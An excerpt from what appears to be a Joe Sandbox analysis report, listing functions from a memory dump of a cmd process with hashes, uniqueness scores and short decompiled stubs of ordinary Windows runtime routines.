                                                                                                                                          • Instruction ID: e04d980bd58893f241371aee587576e8882b92aabb554e6d254ef957ecd07078
                                                                                                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                          • Instruction Fuzzy Hash: 59C08C30280B40AEEB229F20CD01B017AA0FB00B09F4800F06300DA4F0EB78D901E600
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C5A537 Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C5A537(intOrPtr _a4, intOrPtr _a8) {

				return L03BF8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                          0x03c5a553

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                          • Instruction ID: 0d0e306c25f32a546ee7c405d0e75b881386cf6257aec3582740af4e91e2ae09
                                                                                                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                          • Instruction Fuzzy Hash: E4C01236080648BBCB12AE81CC00F067B2AEB94B60F008020BA080A5608632E970EA84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF3A1C Relevance: .0, Instructions: 10COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BF3A1C(intOrPtr _a4) {
				void* _t5;

				return L03BF4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                          0x03bf3a35

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                          • Instruction ID: e2d1fc8743edd7ce0a56697ddcd945685686bf28ef572062a240a699f5c1bcd3
                                                                                                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                          • Instruction Fuzzy Hash: 77C08C32080248BBCB12AE42DC00F027B29E790B60F000060B7040A9608532ED60D588
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C036CC Relevance: .0, Instructions: 10COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                          0x03c036d2
                                                                                                                                          0x03c036e8
                                                                                                                                          0x03c036d4
                                                                                                                                          0x03c036e5
                                                                                                                                          0x03c036e5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                          • Instruction ID: b594b57c0fb2b29688fb29f78b61f9a5c788196417560991cd91a9fb33c46243
                                                                                                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                          • Instruction Fuzzy Hash: 3EC08C78150480BADA159B20CD00B197254F700A21F6802A47220898E0D5289D00D100
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE76E2 Relevance: .0, Instructions: 10COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BE76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                                                          0x03be76e4
                                                                                                                                          0x00000000
                                                                                                                                          0x03be76f8
                                                                                                                                          0x03be76fd

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                          • Instruction ID: e892f5b9b2c6039ac78406307e08fbe8aa10b7815555be6762f5b33dceee2a71
                                                                                                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                          • Instruction Fuzzy Hash: D5C08C741512805EEB2EDB0CCE22B203654EB0860CF4C01FCAA010D4A1CB68B802D288
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDAD30 Relevance: .0, Instructions: 10COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BDAD30(intOrPtr _a4) {

				return L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                          0x03bdad49

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                          • Instruction ID: 1c37a484da7de1d7cfa966ea0f336289aeaf6bd41f388af814ae38f1cdb74bae
                                                                                                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                          • Instruction Fuzzy Hash: 7EC08C32080248BBC712AA45CD01F017B29E790BA0F000060B6040A6618932E860D6C8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF7D50 Relevance: .0, Instructions: 7COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BF7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                          0x03bf7d56
                                                                                                                                          0x03bf7d5b
                                                                                                                                          0x03bf7d60
                                                                                                                                          0x03bf7d5d
                                                                                                                                          0x03bf7d5d
                                                                                                                                          0x03bf7d5d

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                          • Instruction ID: eb3e3a042f799227f7cf387db741de9de505ff9cc4943093e2150718b2302e99
                                                                                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                          • Instruction Fuzzy Hash: 8CB092383019408FCE16DF18C180B1533E8FB44A84B8810E0E400CBA20D629E8008900
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C02ACB Relevance: .0, Instructions: 5COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C02ACB() {
				void* _t5;

				return E03BEEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                                                          0x03c02adc

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                          • Instruction ID: 9e95a2046dc3eaf5f65450698a819c12f6604a528a909e5a7e0400fda31c8ba2
                                                                                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                          • Instruction Fuzzy Hash: 02B01232C11540CFCF02EF54C650B197331FB00750F0545E090013B930C328EC01CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1A3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e0358756b9c292182ae7e9fb552fbc68822938cfb15e7a9b330f5dc318f4a8d2
                                                                                                                                          • Instruction ID: b71da6092cf1a2a4bd1677a0969da442ffa30574ae0a3d7504fbc5b6cdf1bc0f
                                                                                                                                          • Opcode Fuzzy Hash: e0358756b9c292182ae7e9fb552fbc68822938cfb15e7a9b330f5dc318f4a8d2
                                                                                                                                          • Instruction Fuzzy Hash: C79002B120149502D141B159844860B6505A7F0351F71C411E452D554C87558856A261
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 173d469dc36785716993f17c0110086d771b051d13cd7234cb4b1d8e8bda30d0
                                                                                                                                          • Instruction ID: 947bd799a43e15d26c35a086ba7e667c47c2c52a943ff3074715a772d5bb41cb
                                                                                                                                          • Opcode Fuzzy Hash: 173d469dc36785716993f17c0110086d771b051d13cd7234cb4b1d8e8bda30d0
                                                                                                                                          • Instruction Fuzzy Hash: 169002A124105D02D141B15984187071506D7E0651F71C011A412C554D8756896576F1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 208a01a3fd6c34fee86bc59dac330e2b091eb7a52cfa06c4b85066fda006a363
                                                                                                                                          • Instruction ID: 027466e112ab89358b10604d381836bac706260dd66473529d0af0c7725bddb7
                                                                                                                                          • Opcode Fuzzy Hash: 208a01a3fd6c34fee86bc59dac330e2b091eb7a52cfa06c4b85066fda006a363
                                                                                                                                          • Instruction Fuzzy Hash: E59002A120149942D141A2594808B0F560597F1252FB1C019A825E554CCA5588556761
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19A00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6cee6ed5913ff42d73ab52825cad5ea07f4f3c1f3116397c98938065cf128b5d
                                                                                                                                          • Instruction ID: bd1a5c3ecbad9e7bfd58383274825e01de0b63e5dcbdc50f79c4d53976bca6c5
                                                                                                                                          • Opcode Fuzzy Hash: 6cee6ed5913ff42d73ab52825cad5ea07f4f3c1f3116397c98938065cf128b5d
                                                                                                                                          • Instruction Fuzzy Hash: E29002B120145902D101A159481870B150597E0352F71C011A526C555D8765885175B1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1ee014f4823f9009774fb048811f65e14fcf5988722637d310a92d4482cf2276
                                                                                                                                          • Instruction ID: 0adbcfc5c26a1e84cf80b15ebee29980eba679e387c43e42817935da3b5fc098
                                                                                                                                          • Opcode Fuzzy Hash: 1ee014f4823f9009774fb048811f65e14fcf5988722637d310a92d4482cf2276
                                                                                                                                          • Instruction Fuzzy Hash: 669002B120145902D101A159480C747150597E0352F71C011A926C555E87A5C8917571
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C199D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: be1c462629772566599f070150a3f93be7be93fbaba8d58b0e7abdad9c7740e4
                                                                                                                                          • Instruction ID: cfa4948add321c1eec0c7ae9ffb0dc317ad9180aafef71adee7cefc384840f48
                                                                                                                                          • Opcode Fuzzy Hash: be1c462629772566599f070150a3f93be7be93fbaba8d58b0e7abdad9c7740e4
                                                                                                                                          • Instruction Fuzzy Hash: 929002E121105542D105A1594408706154597F1251F71C012A625C554CC6698C616165
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19950 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d4626e5a02e728fe485d610e630659015c5ef0c20f1d7f19f279c6090503b1e7
                                                                                                                                          • Instruction ID: b33b52c888dfc304c5e1a0704c2baf98a7a4aa2248c80668f895321c6db6019f
                                                                                                                                          • Opcode Fuzzy Hash: d4626e5a02e728fe485d610e630659015c5ef0c20f1d7f19f279c6090503b1e7
                                                                                                                                          • Instruction Fuzzy Hash: A29002E120145903D141A5594808607150597E0352F71C011A616C555E8B698C517175
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C198F0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: eb493e9070d09442a3bcdd9990af7f348b293aa61cebdb6a25031c3f6e9c4f82
                                                                                                                                          • Instruction ID: ff3d731d4f7e8143cb53c60005e4861be3829f009ade0058a0b25cfb888713d0
                                                                                                                                          • Opcode Fuzzy Hash: eb493e9070d09442a3bcdd9990af7f348b293aa61cebdb6a25031c3f6e9c4f82
                                                                                                                                          • Instruction Fuzzy Hash: FA9002A160105A02D102B1594408616150A97E0291FB1C022A512C555ECB658992B171
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C198A0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 86248608f6f432ccc3551f289833f6f8464944119ea68f9e0645d2e7c662f4d3
                                                                                                                                          • Instruction ID: 10e478dfd2ec354ce7e3684ae1f5b28f0217528213b1940eb5e5bc80165351d1
                                                                                                                                          • Opcode Fuzzy Hash: 86248608f6f432ccc3551f289833f6f8464944119ea68f9e0645d2e7c662f4d3
                                                                                                                                          • Instruction Fuzzy Hash: 739002A130105902D103A15944186061509D7E1395FB1C012E552C555D87658953B172
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1B040 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d3602944a817c72153a44cab33d05e1f2bbd57bcf9ceab35512cef0f87c7b2d
                                                                                                                                          • Instruction ID: 190e353daec45a7f2d95c47a61be10f63d978f3c412ee6bcca7345c588776422
                                                                                                                                          • Opcode Fuzzy Hash: 0d3602944a817c72153a44cab33d05e1f2bbd57bcf9ceab35512cef0f87c7b2d
                                                                                                                                          • Instruction Fuzzy Hash: 6D9002E1601195434541F15948084066515A7F13513B1C121A455C560C87A88855A2A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19820 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f3c7432997ccea6c60235938e070514c559fdbff9dc435ee37f40e358a7fd94
                                                                                                                                          • Instruction ID: 5a66ac79aab4e8b5d809afdaa4f0d0be484bdfc65d753c6502cf3463491f67d7
                                                                                                                                          • Opcode Fuzzy Hash: 8f3c7432997ccea6c60235938e070514c559fdbff9dc435ee37f40e358a7fd94
                                                                                                                                          • Instruction Fuzzy Hash: 569002B124105902D142B15944086061509A7E0291FB1C012A452C554E87958A56BAA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19760 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 979fafe317d56dd81ce66dfc3d3e8c1958cddac3cc999d6ffaa84e4c86d9533e
                                                                                                                                          • Instruction ID: 97c7700b0fdb3099ecab40909a89c406a1a154444cf8aad2b7dc03f57b0e4fc9
                                                                                                                                          • Opcode Fuzzy Hash: 979fafe317d56dd81ce66dfc3d3e8c1958cddac3cc999d6ffaa84e4c86d9533e
                                                                                                                                          • Instruction Fuzzy Hash: 6E9002B120105903D101A159550C707150597E0251F71D411A452C558DD79688517161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1A770 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 26c613f86b7921a315166785758b1e18e0ff67dd4561ff3cd2aa083e657f3d3d
                                                                                                                                          • Instruction ID: 476b6945b452bdbd2900b0afad11ae3f6785f322ddeb807a7d66cee538eec1e9
                                                                                                                                          • Opcode Fuzzy Hash: 26c613f86b7921a315166785758b1e18e0ff67dd4561ff3cd2aa083e657f3d3d
                                                                                                                                          • Instruction Fuzzy Hash: 389002B520509942D501A5595808A87150597E0355F71D411A452C59CD87948861B161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19770 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d92aafe26e51fd06045963dd88705ba2443397d632f79dcb14592029d1246991
                                                                                                                                          • Instruction ID: dac1965a600adeb1c5faf1dbd8cf71f87f0ea527e19029290344ff4e85e58003
                                                                                                                                          • Opcode Fuzzy Hash: d92aafe26e51fd06045963dd88705ba2443397d632f79dcb14592029d1246991
                                                                                                                                          • Instruction Fuzzy Hash: 829002A120509942D101A559540CA06150597E0255F71D011A516C595DC7758851B171
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1A710 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 24eabc2068e3c2ac31bb9466df8055a7b8fc0e655f0aea64defcc87cb3c19d3d
                                                                                                                                          • Instruction ID: 52321f4876fb4ffa3fd9bd3a6b0c16841d01a5522b6d29b8b53e4bf57b29283c
                                                                                                                                          • Opcode Fuzzy Hash: 24eabc2068e3c2ac31bb9466df8055a7b8fc0e655f0aea64defcc87cb3c19d3d
                                                                                                                                          • Instruction Fuzzy Hash: 5C9002B1301055529501E6995808A4A560597F0351B71D015A811C554C869488616161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19730 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9d9e4b2967f86f7b3a11b4c869a09ba6c51d71b40fa37d009df202fb23fd54f1
                                                                                                                                          • Instruction ID: 900919227ed1b5958604f21f58fecbd1b1d68a5f87ba95251691de39ec1c918d
                                                                                                                                          • Opcode Fuzzy Hash: 9d9e4b2967f86f7b3a11b4c869a09ba6c51d71b40fa37d009df202fb23fd54f1
                                                                                                                                          • Instruction Fuzzy Hash: BC9002A160505902D141B159541C706151597E0251F71D011A412C554DC7998A5576E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C196D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 572ca9a1a8c2badf996de73e5bc3a553b61a32ae2c06eb3f1cd9b73823a1eb90
                                                                                                                                          • Instruction ID: 0fe3d166c9aad7d6844d2cb4d35742a20632740902e71a7be6727304db2af79c
                                                                                                                                          • Opcode Fuzzy Hash: 572ca9a1a8c2badf996de73e5bc3a553b61a32ae2c06eb3f1cd9b73823a1eb90
                                                                                                                                          • Instruction Fuzzy Hash: 7F9002B120105D42D101A1594408B46150597F0351F71C016A422C654D8755C8517561
